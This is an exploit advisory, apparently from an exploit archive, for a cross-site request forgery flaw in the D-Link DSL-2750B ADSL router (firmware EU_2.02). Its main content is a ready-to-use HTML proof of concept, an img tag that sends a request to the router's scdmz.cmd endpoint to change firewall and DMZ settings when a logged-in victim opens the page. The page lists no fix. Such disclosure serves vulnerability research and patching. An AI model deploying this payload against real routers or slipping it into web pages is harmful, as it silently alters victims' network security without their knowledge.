D-Link DSL-2750B ADSL Router - CSRF Vulnerability

2014-02-11 15:05:06

# Exploit Title : D-Link DSL-2750B (ADSL Router) CSRF Vulnerability
# Date : 10-02-2014
# Author : [email protected]
# Vendor site : http://www.d-link.com
# Version : DSL-2750B
# Tested on : Firmware Version: EU_2.02; Hardware Version: B1

The D-Link DSL-2750B's web interface (listening on tcp/ip port 80) is prone to CSRF vulnerabilities which allows to change router parameters.

POC=>

<html lang="en">
<head>
<title>Pinata-CSRF-poc for D-Link</title>
</head>
<body>
<img src="http://192.168.1.1/scdmz.cmd?&fwFlag=50853375&dosenbl=1" />
</body>
</html>

cincin°°°

Fixes

No fixes

In order to submit a new fix you need to be registered.